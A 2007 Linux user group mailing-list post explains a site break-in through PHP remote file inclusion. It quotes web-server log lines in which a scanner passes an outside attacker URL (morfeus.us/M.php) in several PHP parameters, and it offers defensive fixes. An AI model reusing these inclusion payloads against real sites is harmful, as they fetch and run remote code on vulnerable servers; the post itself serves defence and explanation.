PLUG site incident last night

JD Austin jd at twingeckos.com
Mon Jan 1 17:25:44 MST 2007


Using url tricks crackers exploit in many types of web applications.  
The register_globals feature in php is used to trick the site into using 
a different configuration .php file in another location across the net 
and run it.  It's a trick as old as CGI.
Looking at my logs I see TONS of these types attempts:

    208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET
    /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/
    HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET
    /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404
    1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET
    /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&
    / HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET
    /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/
    HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
    208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET
    /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.
    php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"


It was never an issue with Joomla itself but third party components and 
modules coded by people less security minded have been exploited.  
com_extcalendar, com_galeria a few others were commonly used to 
overwrite the index.php and configuration.php files.  From there they'd 
use php to create and run shell scripts to do various malicious things.

Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Since Joomla 1.0.11 this issue has been addressed using .htaccess and 
re-coding to allow register globals to be turned off.   Since Joomla is 
used on a wide range of platforms (even windows) they still support the 
old register_globals method of variables but try to coerce users into 
setting it up right.

I also install mod_security to make that sort of attack stop in it's tracks.

JD

Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been 
> working lately, so I haven't kept up): what exactly was cracked on the site 
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>   
>> Edward Norton wrote:
>>     
>>> PLUG cracked AGAIN? Not surprising considering you guys wont consider
>>> anything other than a badly coded PHP CMS.
>>>       
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it.  At least that's what your message implies.  I have an idea.  When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>     
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change  you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>   
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20070101/e35c9d37/attachment.htm 


More information about the PLUG-discuss mailing list